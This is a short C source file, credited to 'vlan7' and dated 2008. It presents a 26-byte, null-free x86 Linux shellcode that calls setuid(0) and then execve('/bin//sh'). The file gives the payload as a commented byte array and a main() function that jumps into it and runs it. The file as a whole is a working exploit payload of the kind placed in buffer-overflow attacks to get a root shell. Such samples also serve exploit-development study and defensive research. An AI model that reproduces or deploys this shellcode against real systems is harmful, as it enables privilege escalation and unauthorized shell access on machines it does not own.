/*
Smallest GNU/Linux x86 setuid/execve shellcode without NULLs
(based on Chema Garcia, aka sch3m4's code from opensec)
(shrinked down only for the fun of gettin' the most minimalistic shellcode possible)

vlan7 - 19/11/2008
http://vlan7.blogspot.com

Shellcode size: 26 bytes
*/

#include <stdio.h>

char sc[] =
  "\x31\xc0" //xor eax,eax
  "\x99" //cdq
  "\xb0\x17" //mov al,17h
  "\x60" //pusha
  "\xcd\x80" //int 80h
  "\x61" //popa
  "\x52" //push edx
  "\x68\x6e\x2f\x73\x68" //push 0x68732f6e
  "\x68\x2f\x2f\x62\x69" //push 0x69622f2f
  "\x89\xe3" //mov ebx,esp
  "\xb0\x0b" //mov al,0bh
  "\xcd\x80"; //int 80h

void main() {
  printf("Smallest GNU/Linux x86 setuid/execve shellcode without NULLs"
  "\n(based on Chema Garcia, aka sch3m4's code from opensec)"
  "(only for the fun of gettin' the most minimalistic shellcode possible)"
  "\n\nvlan7 - 19/11/2008"
  "\nhttp://vlan7.blogspot.com"
  "\n\nShellcode size: %d bytes\n", sizeof(sc)-1);
  (*(void (*)()) sc)();
}